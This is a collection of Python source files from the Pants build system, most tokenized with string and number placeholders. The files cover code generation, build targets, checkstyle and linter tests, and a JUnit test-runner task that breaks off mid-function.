<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . contrib . cpp . targets . cpp_target import CppTarget <EOL> class CppLibrary ( CppTarget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> * args , <EOL> ** kwargs ) : <EOL> super ( CppLibrary , self ) . __init__ ( * args , ** kwargs ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import re <EOL> import subprocess <EOL> from pants . backend . codegen . subsystems . thrift_defaults import ThriftDefaults <EOL> from pants . backend . codegen . tasks . simple_codegen_task import SimpleCodegenTask <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants . base . exceptions import TaskError <EOL> from pants . base . workunit import WorkUnitLabel <EOL> from pants . binaries . thrift_binary import ThriftBinary <EOL> from pants . util . dirutil import safe_mkdir <EOL> from pants . util . memo import memoized_property <EOL> from twitter . common . collections import OrderedSet <EOL> from pants . contrib . go . targets . go_thrift_library import GoThriftGenLibrary , GoThriftLibrary <EOL> class GoThriftGen ( SimpleCodegenTask ) : <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( GoThriftGen , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , default = True , fingerprint = True , type = bool , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , fingerprint = True , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' ) <EOL> @ classmethod <EOL> def global_subsystems ( cls ) : <EOL> return super ( GoThriftGen , cls ) . global_subsystems ( ) + ( ThriftDefaults , ) <EOL> @ classmethod <EOL> def task_subsystems ( cls ) : <EOL> return super ( GoThriftGen , cls ) . task_subsystems ( ) + ( ThriftBinary . Factory , ) <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( super ( GoThriftGen , cls ) . subsystem_dependencies ( ) + <EOL> ( ThriftDefaults , ThriftBinary . Factory . 
scoped ( cls ) ) ) <EOL> @ memoized_property <EOL> def _thrift_binary ( self ) : <EOL> thrift_binary = ThriftBinary . Factory . scoped_instance ( self ) . create ( ) <EOL> return thrift_binary . path <EOL> @ memoized_property <EOL> def _deps ( self ) : <EOL> thrift_import_target = self . get_options ( ) . thrift_import_target <EOL> thrift_imports = self . context . resolve ( thrift_import_target ) <EOL> return thrift_imports <EOL> @ memoized_property <EOL> def _service_deps ( self ) : <EOL> service_deps = self . get_options ( ) . service_deps <EOL> return list ( self . resolve_deps ( service_deps ) ) if service_deps else self . _deps <EOL> SERVICE_PARSER = re . compile ( r'<STR_LIT>' ) <EOL> NAMESPACE_PARSER = re . compile ( r'<STR_LIT>' , re . MULTILINE ) <EOL> def _declares_service ( self , source ) : <EOL> with open ( source ) as thrift : <EOL> return any ( line for line in thrift if self . SERVICE_PARSER . search ( line ) ) <EOL> def _get_go_namespace ( self , source ) : <EOL> with open ( source ) as thrift : <EOL> namespace = self . NAMESPACE_PARSER . search ( thrift . read ( ) ) <EOL> if not namespace : <EOL> raise TaskError ( '<STR_LIT>' , source ) <EOL> return namespace . group ( <NUM_LIT:1> ) <EOL> def synthetic_target_extra_dependencies ( self , target , target_workdir ) : <EOL> for source in target . sources_relative_to_buildroot ( ) : <EOL> if self . _declares_service ( os . path . join ( get_buildroot ( ) , source ) ) : <EOL> return self . _service_deps <EOL> return self . _deps <EOL> def synthetic_target_type ( self , target ) : <EOL> return GoThriftGenLibrary <EOL> def is_gentarget ( self , target ) : <EOL> return isinstance ( target , GoThriftLibrary ) <EOL> @ memoized_property <EOL> def _thrift_cmd ( self ) : <EOL> cmd = [ self . _thrift_binary ] <EOL> thrift_import = '<STR_LIT>' . format ( self . get_options ( ) . thrift_import ) <EOL> gen_options = self . get_options ( ) . 
gen_options <EOL> if gen_options : <EOL> gen_options += '<STR_LIT:U+002C>' + thrift_import <EOL> else : <EOL> gen_options = thrift_import <EOL> cmd . extend ( ( '<STR_LIT>' , '<STR_LIT>' . format ( gen_options ) ) ) <EOL> if self . get_options ( ) . strict : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> if self . get_options ( ) . level == '<STR_LIT>' : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> return cmd <EOL> def _generate_thrift ( self , target , target_workdir ) : <EOL> target_cmd = self . _thrift_cmd [ : ] <EOL> bases = OrderedSet ( tgt . target_base for tgt in target . closure ( ) if self . is_gentarget ( tgt ) ) <EOL> for base in bases : <EOL> target_cmd . extend ( ( '<STR_LIT>' , base ) ) <EOL> target_cmd . extend ( ( '<STR_LIT>' , target_workdir ) ) <EOL> all_sources = list ( target . sources_relative_to_buildroot ( ) ) <EOL> if len ( all_sources ) != <NUM_LIT:1> : <EOL> raise TaskError ( '<STR_LIT>' , target ) <EOL> source = all_sources [ <NUM_LIT:0> ] <EOL> target_cmd . append ( os . path . join ( get_buildroot ( ) , source ) ) <EOL> with self . context . new_workunit ( name = source , <EOL> labels = [ WorkUnitLabel . TOOL ] , <EOL> cmd = '<STR_LIT:U+0020>' . join ( target_cmd ) ) as workunit : <EOL> result = subprocess . call ( target_cmd , <EOL> stdout = workunit . output ( '<STR_LIT>' ) , <EOL> stderr = workunit . output ( '<STR_LIT>' ) ) <EOL> if result != <NUM_LIT:0> : <EOL> raise TaskError ( '<STR_LIT>' . format ( self . _thrift_binary , result ) ) <EOL> gen_dir = os . path . join ( target_workdir , '<STR_LIT>' ) <EOL> src_dir = os . path . join ( target_workdir , '<STR_LIT:src>' ) <EOL> safe_mkdir ( src_dir ) <EOL> go_dir = os . path . join ( target_workdir , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> os . rename ( gen_dir , go_dir ) <EOL> @ classmethod <EOL> def product_types ( cls ) : <EOL> return [ '<STR_LIT>' ] <EOL> def execute_codegen ( self , target , target_workdir ) : <EOL> self . 
_generate_thrift ( target , target_workdir ) <EOL> def synthetic_target_dir ( self , target , target_workdir ) : <EOL> all_sources = list ( target . sources_relative_to_buildroot ( ) ) <EOL> source = all_sources [ <NUM_LIT:0> ] <EOL> namespace = self . _get_go_namespace ( source ) <EOL> return os . path . join ( target_workdir , '<STR_LIT:src>' , '<STR_LIT>' , namespace . replace ( "<STR_LIT:.>" , os . path . sep ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PrimitiveField <EOL> from pants . contrib . node . targets . node_package import NodePackage <EOL> class NodeRemoteModule ( NodePackage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , version = None , address = None , payload = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT:version>' : PrimitiveField ( version or '<STR_LIT:*>' ) , <EOL> } ) <EOL> super ( NodeRemoteModule , self ) . __init__ ( address = address , payload = payload , ** kwargs ) <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . payload . version </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . contrib . python . checks . tasks . checkstyle . plugin_subsystem_base import PluginSubsystemBase <EOL> class ImportOrderSubsystem ( PluginSubsystemBase ) : <EOL> options_scope = '<STR_LIT>' <EOL> def get_plugin_type ( self ) : <EOL> from pants . contrib . python . checks . tasks . checkstyle . import_order import ImportOrder <EOL> return ImportOrder </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants_test . contrib . python . checks . tasks . checkstyle . plugin_test_base import CheckstylePluginTestBase <EOL> from pants . contrib . python . checks . tasks . checkstyle . common import Nit , PythonFile <EOL> from pants . contrib . python . checks . tasks . checkstyle . future_compatibility import FutureCompatibility <EOL> BAD_CLASS = PythonFile . from_statement ( """<STR_LIT>""" ) <EOL> class FutureCompatibilityTest ( CheckstylePluginTestBase ) : <EOL> plugin_type = FutureCompatibility <EOL> def exemplar_fail ( self , code , severity , statement ) : <EOL> self . assertNit ( statement , code , severity ) <EOL> def exemplar_pass ( self , statement ) : <EOL> self . assertNoNits ( statement ) <EOL> def test_xrange ( self ) : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" ) <EOL> self . exemplar_pass ( """<STR_LIT>""" ) <EOL> def test_iters ( self ) : <EOL> for function_name in FutureCompatibility . BAD_ITERS : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" % function_name ) <EOL> def test_names ( self ) : <EOL> for class_name in FutureCompatibility . BAD_NAMES : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" % class_name ) <EOL> def test_metaclass ( self ) : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . WARNING , """<STR_LIT>""" ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from mock import Mock , patch <EOL> from pants . backend . codegen . targets . java_thrift_library import JavaThriftLibrary <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants_test . tasks . task_test_base import TaskTestBase <EOL> from pants . contrib . scrooge . tasks . thrift_linter import ThriftLinter <EOL> class ThriftLinterTest ( TaskTestBase ) : <EOL> def _prepare_mocks ( self , task ) : <EOL> self . _run_java_mock = Mock ( return_value = <NUM_LIT:0> ) <EOL> task . tool_classpath = Mock ( return_value = '<STR_LIT>' ) <EOL> task . runjava = self . _run_java_mock <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return BuildFileAliases ( <EOL> targets = { <EOL> '<STR_LIT>' : JavaThriftLibrary , <EOL> } , <EOL> ) <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return ThriftLinter <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lint ( self , mock_calculate_compile_sources ) : <EOL> def get_default_jvm_options ( ) : <EOL> return self . task_type ( ) . get_jvm_options_default ( self . context ( ) . options . for_global_scope ( ) ) <EOL> thrift_target = self . create_library ( '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT:a>' , [ '<STR_LIT>' ] ) <EOL> task = self . create_task ( self . context ( target_roots = thrift_target ) ) <EOL> self . _prepare_mocks ( task ) <EOL> expected_include_paths = { '<STR_LIT>' , '<STR_LIT>' } <EOL> expected_paths = { '<STR_LIT>' , '<STR_LIT>' } <EOL> mock_calculate_compile_sources . return_value = ( expected_include_paths , expected_paths ) <EOL> task . _lint ( thrift_target ) <EOL> self . _run_java_mock . 
assert_called_once_with ( classpath = '<STR_LIT>' , <EOL> main = '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> jvm_options = get_default_jvm_options ( ) , <EOL> workunit_labels = [ '<STR_LIT>' ] ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . backend . jvm . targets . jvm_target import JvmTarget <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PrimitiveField <EOL> class JaxbLibrary ( JvmTarget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , payload = None , package = None , language = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT>' : PrimitiveField ( package ) , <EOL> '<STR_LIT>' : PrimitiveField ( language ) , <EOL> } ) <EOL> super ( JaxbLibrary , self ) . __init__ ( payload = payload , ** kwargs ) <EOL> self . add_labels ( '<STR_LIT>' ) <EOL> self . add_labels ( '<STR_LIT>' ) <EOL> if language != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' <EOL> . format ( lang = language , class_type = type ( self ) . __name__ ) ) <EOL> @ property <EOL> def package ( self ) : <EOL> return self . payload . package </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from six import string_types <EOL> from pants . backend . jvm . repository import Repository <EOL> from pants . base . payload_field import PayloadField , stable_json_sha1 <EOL> class PublicationMetadata ( PayloadField ) : <EOL> """<STR_LIT>""" <EOL> class Artifact ( PayloadField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , org , name , repo , publication_metadata = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( org , string_types ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( string_types , org ) ) <EOL> if not isinstance ( name , string_types ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( string_types , name ) ) <EOL> if not isinstance ( repo , Repository ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( publication_metadata is not None <EOL> and not isinstance ( publication_metadata , PublicationMetadata ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> . format ( PublicationMetadata , type ( publication_metadata ) ) ) <EOL> self . org = org <EOL> self . _base_name = name <EOL> self . repo = repo <EOL> self . publication_metadata = publication_metadata <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _base_name <EOL> @ name . setter <EOL> def name ( self , value ) : <EOL> self . _base_name = value <EOL> def __eq__ ( self , other ) : <EOL> return ( type ( other ) == Artifact and <EOL> self . org == other . org and <EOL> self . name == other . name ) <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . org , self . name ) ) <EOL> def _compute_fingerprint ( self ) : <EOL> data = ( self . org , self . name ) <EOL> data += ( None , ) <EOL> if self . publication_metadata : <EOL> fingerprint = self . publication_metadata . 
fingerprint ( ) <EOL> if fingerprint : <EOL> data += ( fingerprint , ) <EOL> return stable_json_sha1 ( data ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . org , self . name , self . repo ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> from collections import OrderedDict , namedtuple <EOL> from hashlib import sha1 <EOL> import six <EOL> from twitter . common . dirutil import Fileset <EOL> from pants . backend . jvm . targets . jvm_binary import JvmBinary <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants . base . exceptions import TargetDefinitionException <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PayloadField , PrimitiveField , combine_hashes <EOL> from pants . base . validation import assert_list <EOL> from pants . build_graph . target import Target <EOL> from pants . source . wrapped_globs import FilesetWithSpec <EOL> from pants . util . dirutil import fast_relpath <EOL> from pants . util . memo import memoized_property <EOL> class RelativeToMapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base ) : <EOL> """<STR_LIT>""" <EOL> self . base = base <EOL> def __call__ ( self , path ) : <EOL> return os . path . relpath ( path , self . base ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . base ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . base ) <EOL> class DirectoryReMapper ( object ) : <EOL> """<STR_LIT>""" <EOL> class NonexistentBaseError ( Exception ) : <EOL> pass <EOL> def __init__ ( self , base , dest ) : <EOL> """<STR_LIT>""" <EOL> self . base = os . path . abspath ( os . path . join ( get_buildroot ( ) , base ) ) <EOL> if not os . path . isdir ( self . base ) : <EOL> raise DirectoryReMapper . NonexistentBaseError ( <EOL> '<STR_LIT>' . format ( self . base ) ) <EOL> self . dest = dest <EOL> def __call__ ( self , path ) : <EOL> return os . path . join ( self . dest , os . path . relpath ( path , self . base ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . 
base , self . dest ) <EOL> class BundleProps ( namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> @ memoized_property <EOL> def filemap ( self ) : <EOL> filemap = OrderedDict ( ) <EOL> if self . fileset is not None : <EOL> paths = self . fileset ( ) if isinstance ( self . fileset , Fileset ) else self . fileset if hasattr ( self . fileset , '<STR_LIT>' ) else [ self . fileset ] <EOL> for path in paths : <EOL> abspath = path <EOL> if not os . path . isabs ( abspath ) : <EOL> abspath = os . path . join ( get_buildroot ( ) , self . rel_path , path ) <EOL> filemap [ abspath ] = self . mapper ( abspath ) <EOL> return filemap <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . rel_path , self . mapper ) ) <EOL> class Bundle ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parse_context ) : <EOL> self . _rel_path = parse_context . rel_path <EOL> def __call__ ( self , rel_path = None , mapper = None , relative_to = None , fileset = None ) : <EOL> """<STR_LIT>""" <EOL> if mapper and relative_to : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if rel_path and isinstance ( fileset , FilesetWithSpec ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( fileset , FilesetWithSpec ) : <EOL> pass <EOL> elif isinstance ( fileset , six . string_types ) : <EOL> fileset = [ fileset ] <EOL> else : <EOL> fileset = assert_list ( fileset , key_arg = '<STR_LIT>' ) <EOL> real_rel_path = rel_path or self . _rel_path <EOL> if relative_to : <EOL> base = os . path . join ( get_buildroot ( ) , real_rel_path , relative_to ) <EOL> mapper = RelativeToMapper ( base ) <EOL> else : <EOL> mapper = mapper or RelativeToMapper ( os . path . join ( get_buildroot ( ) , real_rel_path ) ) <EOL> return BundleProps ( real_rel_path , mapper , fileset ) <EOL> class BundleField ( tuple , PayloadField ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _hash_bundle ( bundle ) : <EOL> hasher = sha1 ( ) <EOL> hasher . 
update ( bundle . rel_path ) <EOL> for abs_path in sorted ( bundle . filemap . keys ( ) ) : <EOL> buildroot_relative_path = os . path . relpath ( abs_path , get_buildroot ( ) ) <EOL> hasher . update ( buildroot_relative_path ) <EOL> hasher . update ( bundle . filemap [ abs_path ] ) <EOL> if os . path . isfile ( abs_path ) : <EOL> hasher . update ( '<STR_LIT:e>' ) <EOL> with open ( abs_path , '<STR_LIT:rb>' ) as f : <EOL> hasher . update ( f . read ( ) ) <EOL> return hasher . hexdigest ( ) <EOL> def _compute_fingerprint ( self ) : <EOL> return combine_hashes ( map ( BundleField . _hash_bundle , self ) ) <EOL> class JvmApp ( Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None , payload = None , binary = None , bundles = None , basename = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT>' : PrimitiveField ( basename or name ) , <EOL> '<STR_LIT>' : PrimitiveField ( binary ) , <EOL> '<STR_LIT>' : BundleField ( bundles or [ ] ) , <EOL> } ) <EOL> super ( JvmApp , self ) . __init__ ( name = name , payload = payload , ** kwargs ) <EOL> if name == basename : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' ) <EOL> def globs_relative_to_buildroot ( self ) : <EOL> buildroot = get_buildroot ( ) <EOL> globs = [ ] <EOL> for bundle in self . bundles : <EOL> fileset = bundle . fileset <EOL> if fileset is None : <EOL> continue <EOL> elif hasattr ( fileset , '<STR_LIT>' ) : <EOL> globs += bundle . fileset . filespec [ '<STR_LIT>' ] <EOL> else : <EOL> globs += [ fast_relpath ( f , buildroot ) for f in bundle . filemap . keys ( ) ] <EOL> super_globs = super ( JvmApp , self ) . globs_relative_to_buildroot ( ) <EOL> if super_globs : <EOL> globs += super_globs [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : globs } <EOL> @ property <EOL> def traversable_dependency_specs ( self ) : <EOL> for spec in super ( JvmApp , self ) . 
traversable_dependency_specs : <EOL> yield spec <EOL> if self . payload . binary : <EOL> yield self . payload . binary <EOL> @ property <EOL> def basename ( self ) : <EOL> return self . payload . basename <EOL> @ property <EOL> def bundles ( self ) : <EOL> return self . payload . bundles <EOL> @ property <EOL> def binary ( self ) : <EOL> """<STR_LIT>""" <EOL> dependencies = self . dependencies <EOL> if len ( dependencies ) != <NUM_LIT:1> : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' <EOL> '<STR_LIT>' . format ( dependencies ) ) <EOL> binary = dependencies [ <NUM_LIT:0> ] <EOL> if not isinstance ( binary , JvmBinary ) : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' <EOL> '<STR_LIT>' . format ( binary ) ) <EOL> return binary <EOL> @ property <EOL> def jar_dependencies ( self ) : <EOL> return self . binary . jar_dependencies </s>
# NOTE(review): literals in this corpus are abstracted to <STR_LIT>/<NUM_LIT>
# placeholders, so comments describe structure rather than concrete option
# names or flag values.
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import copy
import os
import sys
from collections import defaultdict

from six.moves import range
from twitter.common.collections import OrderedSet

from pants.backend.jvm.subsystems.jvm_platform import JvmPlatform
from pants.backend.jvm.subsystems.shader import Shader
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.java_tests import JavaTests as junit_tests
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.coverage.base import Coverage
from pants.backend.jvm.tasks.coverage.cobertura import Cobertura, CoberturaTaskSettings
from pants.backend.jvm.tasks.jvm_task import JvmTask
from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TargetDefinitionException, TaskError, TestFailedTaskError
from pants.base.workunit import WorkUnitLabel
from pants.binaries import binary_util
from pants.build_graph.target_scopes import Scopes
from pants.java.distribution.distribution import DistributionLocator
from pants.java.executor import SubprocessExecutor
from pants.task.testrunner_task_mixin import TestRunnerTaskMixin
from pants.util.argutil import ensure_arg, remove_arg
from pants.util.contextutil import environment_as
from pants.util.strutil import pluralize
from pants.util.xml_parser import XmlParser


def _classfile_to_classname(cls):
    """Map a relative classfile path to a fully qualified class name."""
    return ClasspathUtil.classname_for_rel_classfile(cls)


def interpret_test_spec(test_spec):
    """Split a test spec into (src_spec, cls_spec); exactly one side is None.

    The spec is split once on '#' into a classname-or-sourcefile component and an
    optional method suffix.  If the first component names an existing path, the
    spec is treated as a source file; otherwise as a class name.
    """
    components = test_spec.split('<STR_LIT:#>', <NUM_LIT:2>)
    classname_or_srcfile = components[<NUM_LIT:0>]
    methodname = '<STR_LIT:#>' + components[<NUM_LIT:1>] if len(components) == <NUM_LIT:2> else '<STR_LIT>'
    if os.path.exists(classname_or_srcfile):
        return ((classname_or_srcfile, methodname), None)
    else:
        return (None, (classname_or_srcfile, methodname))


class JUnitRun(TestRunnerTaskMixin, JvmToolTaskMixin, JvmTask):
    """Runs JUnit tests for JVM test targets, batching them by shared properties."""

    # Fully qualified main class of the shaded JUnit runner tool.
    _MAIN = '<STR_LIT>'

    @classmethod
    def register_options(cls, register):
        super(JUnitRun, cls).register_options(register)
        # NOTE(review): Python 2 only -- sys.maxint does not exist on Python 3.
        register('<STR_LIT>', advanced=True, type=int, default=sys.maxint,
                 help='<STR_LIT>')
        register('<STR_LIT>', type=list,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', type=bool, help='<STR_LIT>')
        register('<STR_LIT>', advanced=True,
                 choices=junit_tests.VALID_CONCURRENCY_OPTS, default=junit_tests.CONCURRENCY_SERIAL,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        # Deprecated option: registered with removal_hint/removal_version.
        register('<STR_LIT>', advanced=True, type=bool,
                 removal_hint='<STR_LIT>', removal_version='<STR_LIT>',
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True, type=int, default=<NUM_LIT:0>,
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        # Three-valued output mode option; mapped onto runner flags in __init__.
        register('<STR_LIT>', choices=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], default='<STR_LIT>',
                 help='<STR_LIT>'
                      '<STR_LIT>'
                      '<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', advanced=True,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', type=bool, advanced=True,
                 help='<STR_LIT>'
                      '<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', type=bool, default=True,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', type=bool, advanced=True,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        # The runner tool jar, shaded except for the excluded packages below.
        cls.register_jvm_tool(register,
                              '<STR_LIT>',
                              classpath=[
                                  JarDependency(org='<STR_LIT>', name='<STR_LIT>', rev='<STR_LIT>'),
                              ],
                              main=JUnitRun._MAIN,
                              custom_rules=[
                                  Shader.exclude_package('<STR_LIT>', recursive=True),
                                  Shader.exclude_package('<STR_LIT>', recursive=True),
                                  Shader.exclude_package('<STR_LIT>', recursive=True),
                                  Shader.exclude_package('<STR_LIT>', recursive=True),
                              ])
        # Coverage processors register their own options and tool jars.
        for c in [Coverage, Cobertura]:
            c.register_options(register, cls.register_jvm_tool)

    @classmethod
    def subsystem_dependencies(cls):
        return super(JUnitRun, cls).subsystem_dependencies() + (DistributionLocator,)

    @classmethod
    def request_classes_by_source(cls, test_specs):
        """True if any spec's first component names an existing source file."""
        for test_spec in test_specs:
            src_spec, _ = interpret_test_spec(test_spec)
            if src_spec:
                return True
        return False

    @classmethod
    def prepare(cls, options, round_manager):
        super(JUnitRun, cls).prepare(options, round_manager)
        round_manager.require_data('<STR_LIT>')
        # The second product is only needed when tests are addressed by source file.
        if cls.request_classes_by_source(options.test or []):
            round_manager.require_data('<STR_LIT>')

    def __init__(self, *args, **kwargs):
        super(JUnitRun, self).__init__(*args, **kwargs)
        options = self.get_options()
        self._coverage = None
        if options.coverage or options.is_flagged('<STR_LIT>'):
            coverage_processor = options.coverage_processor
            # Cobertura is the only supported processor; anything else is an error.
            if coverage_processor == '<STR_LIT>':
                settings = CoberturaTaskSettings.from_task(self)
                self._coverage = Cobertura(settings)
            else:
                raise TaskError('<STR_LIT>'.format(coverage_processor))
        self._tests_to_run = options.test
        self._batch_size = options.batch_size
        self._fail_fast = options.fail_fast
        self._working_dir = options.cwd or get_buildroot()
        self._strict_jvm_version = options.strict_jvm_version
        # Copy so per-run appends below never mutate the shared option value.
        self._args = copy.copy(self.args)
        self._failure_summary = options.failure_summary
        # Translate the three-valued output mode into a runner flag.
        if options.output_mode == '<STR_LIT>':
            self._args.append('<STR_LIT>')
        elif options.output_mode == '<STR_LIT>':
            self._args.append('<STR_LIT>')
        else:
            self._args.append('<STR_LIT>')
        if self._fail_fast:
            self._args.append('<STR_LIT>')
        self._args.append('<STR_LIT>')
        self._args.append(self.workdir)
        if options.per_test_timer:
            self._args.append('<STR_LIT>')
        # Deprecated flag kept alongside the newer concurrency option.
        if options.default_parallel:
            self._args.append('<STR_LIT>')
        if options.default_concurrency == junit_tests.CONCURRENCY_PARALLEL_BOTH:
            self.context.log.warn('<STR_LIT>')
            self._args.append('<STR_LIT>')
            self._args.append('<STR_LIT>')
        elif options.default_concurrency == junit_tests.CONCURRENCY_PARALLEL_CLASSES:
            self._args.append('<STR_LIT>')
        elif options.default_concurrency == junit_tests.CONCURRENCY_PARALLEL_METHODS:
            # Parallel-methods is not implemented at task-default level.
            self.context.log.warn('<STR_LIT>')
            raise NotImplementedError()
        elif options.default_concurrency == junit_tests.CONCURRENCY_SERIAL:
            pass
        self._args.append('<STR_LIT>')
        self._args.append(str(options.parallel_threads))
        if options.test_shard:
            self._args.append('<STR_LIT>')
            self._args.append(options.test_shard)

    def classpath(self, targets, classpath_product=None):
        # Restrict the classpath to JVM test scopes.
        return super(JUnitRun, self).classpath(targets, classpath_product=classpath_product,
                                               include_scopes=Scopes.JVM_TEST_SCOPES)

    def preferred_jvm_distribution_for_targets(self, targets):
        """Pick a JVM distribution compatible with the platforms of the JvmTargets given."""
        return JvmPlatform.preferred_jvm_distribution([target.platform for target in targets
                                                       if isinstance(target, JvmTarget)],
                                                      self._strict_jvm_version)

    def _spawn(self, distribution, executor=None, *args, **kwargs):
        """Start the java process asynchronously; defaults to a SubprocessExecutor."""
        actual_executor = executor or SubprocessExecutor(distribution)
        return distribution.execute_java_async(*args,
                                               executor=actual_executor,
                                               **kwargs)

    def execute_java_for_targets(self, targets, *args, **kwargs):
        """Run java synchronously using a distribution suited to `targets`."""
        distribution = self.preferred_jvm_distribution_for_targets(targets)
        actual_executor = kwargs.get('<STR_LIT>') or SubprocessExecutor(distribution)
        return self._spawn_and_wait(*args, executor=actual_executor, distribution=distribution, **kwargs)

    def execute_java_for_coverage(self, targets, executor=None, *args, **kwargs):
        """Run java synchronously for the coverage processor's instrument/report steps."""
        distribution = self.preferred_jvm_distribution_for_targets(targets)
        actual_executor = executor or SubprocessExecutor(distribution)
        return distribution.execute_java(*args, executor=actual_executor, **kwargs)

    def _collect_test_targets(self, targets):
        """Map each test (classname[#method]) to its owning target.

        When explicit test specs were supplied, restrict to those and fail on any
        spec whose class cannot be attributed to a target.
        """
        # dict() over the generator: later (classname, target) pairs win on duplicates.
        tests_from_targets = dict(list(self._calculate_tests_from_targets(targets)))
        if targets and self._tests_to_run:
            tests_with_targets = {}
            unknown_tests = []
            for test in self._get_tests_to_run():
                # Look the class up without any '#method' suffix.
